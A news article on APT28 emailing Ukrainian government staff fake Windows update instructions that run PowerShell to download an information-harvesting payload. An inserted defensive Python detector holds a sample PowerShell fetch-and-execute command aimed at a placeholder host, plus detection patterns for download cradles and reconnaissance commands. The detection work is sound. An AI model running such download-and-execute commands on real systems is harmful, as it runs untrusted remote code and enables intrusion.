Russian hackers use fake Windows updates to target Ukrainian government

May 1, 2023 | News


APT28 Uses Fake Windows Upgrade Emails to Target Ukrainian Government Bodies


Russian state-sponsored hacking group APT28 (also known as Fancy Bear) is targeting various government bodies in Ukraine with malicious emails, posing as instructions on how to upgrade Windows for cyberattack defense, according to the Computer Emergency Response Team of Ukraine (CERT-UA).

The attackers created @outlook.com email addresses using real employee names acquired in the preparatory stages of the attack. Instead of legitimate instructions on upgrading Windows systems, the emails advise recipients to run a PowerShell command, which downloads a PowerShell script to the computer. The script then simulates a Windows update process while downloading a second PowerShell payload in the background.

The second-stage payload is an information harvesting tool that abuses the ‘tasklist’ and ‘systeminfo’ commands to gather data and sends it to a Mocky service API via an HTTP request. Mocky is a legitimate application that APT28 abused for data exfiltration.

Instructions sent to targets (CERT-UA)


CERT-UA recommends system administrators restrict PowerShell and monitor network traffic

CERT-UA recommends that system administrators monitor network traffic for connections to the Mocky service API and restrict the ability to launch PowerShell on critical computers.
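The two recommendations above map directly onto endpoint and proxy telemetry. The following detector is an added example, not CERT-UA's or the article's code: it runs over constructed events and flags PowerShell command lines that fetch and execute remote code, the tasklist/systeminfo harvesters spawned by PowerShell, and connections to the Mocky API host. MOCKY_HOST, the hostnames and the URLs are assumptions; the article names the service but not the host.

```python
"""Added example: apply the CERT-UA recommendations to constructed telemetry."""
import re
from typing import Optional

MOCKY_HOST = "run.mocky.io"  # assumed exfiltration endpoint, not from the article
HARVESTERS = {"tasklist.exe", "systeminfo.exe"}  # commands the second stage abuses
# Keywords that indicate PowerShell is downloading and running remote code.
CRADLE_RE = re.compile(
    r"downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)


def classify(event: dict) -> Optional[str]:
    """Return an alert label for one event, or None if it looks benign."""
    if event["type"] == "process":
        image = event["image"].lower()
        parent = event["parent"].lower()
        if image == "powershell.exe" and CRADLE_RE.search(event["cmdline"]):
            return "powershell download cradle"
        if image in HARVESTERS and parent == "powershell.exe":
            return "recon tool spawned by PowerShell"
    elif event["type"] == "network" and event["dest"].lower() == MOCKY_HOST:
        return "connection to Mocky API"
    return None


def triage(events: list) -> list:
    """Run every event through classify() and return (host, alert) pairs."""
    return [(e["host"], label) for e in events if (label := classify(e))]


# Constructed telemetry; hosts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-01", "image": "explorer.exe",
     "parent": "userinit.exe", "cmdline": "explorer.exe"},
    {"type": "process", "host": "ws-01", "image": "powershell.exe",
     "parent": "explorer.exe",
     "cmdline": 'powershell -c "iwr https://example.invalid/update.ps1 | iex"'},
    {"type": "process", "host": "ws-01", "image": "tasklist.exe",
     "parent": "powershell.exe", "cmdline": "tasklist"},
    {"type": "process", "host": "ws-01", "image": "systeminfo.exe",
     "parent": "powershell.exe", "cmdline": "systeminfo"},
    {"type": "network", "host": "ws-01", "dest": "run.mocky.io", "port": 443},
    {"type": "process", "host": "ws-02", "image": "powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell -c Get-Date"},
    {"type": "network", "host": "ws-02", "dest": "update.example.invalid", "port": 443},
]

if __name__ == "__main__":
    for host, alert in triage(SAMPLE_EVENTS):
        print(f"{host}: {alert}")
```

Only ws-01 produces alerts; the benign PowerShell invocation and the unrelated HTTPS connection on ws-02 are left alone.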

This comes as Google’s Threat Analysis Group reports that 60% of all phishing emails targeting Ukraine in Q1 2023 originated from Russian threat actors, highlighting APT28’s contribution to malicious activity. Earlier in the month, US and UK intelligence services and Cisco warned about APT28 actively exploiting a zero-day flaw affecting the company’s routers to deploy a malware named ‘Jaguar Tooth’ to collect intelligence from US and EU-based targets.

In March 2023, Microsoft patched an Outlook zero-day vulnerability tracked as CVE-2023-23397, which APT28 has exploited since April 2022 to breach the networks of European government, military, energy, and transportation organizations. Notably, Chinese hackers also used Windows updates as a lure to drop malicious executables in attacks against Russian government agencies last year.


Source: bleepingcomputer.com
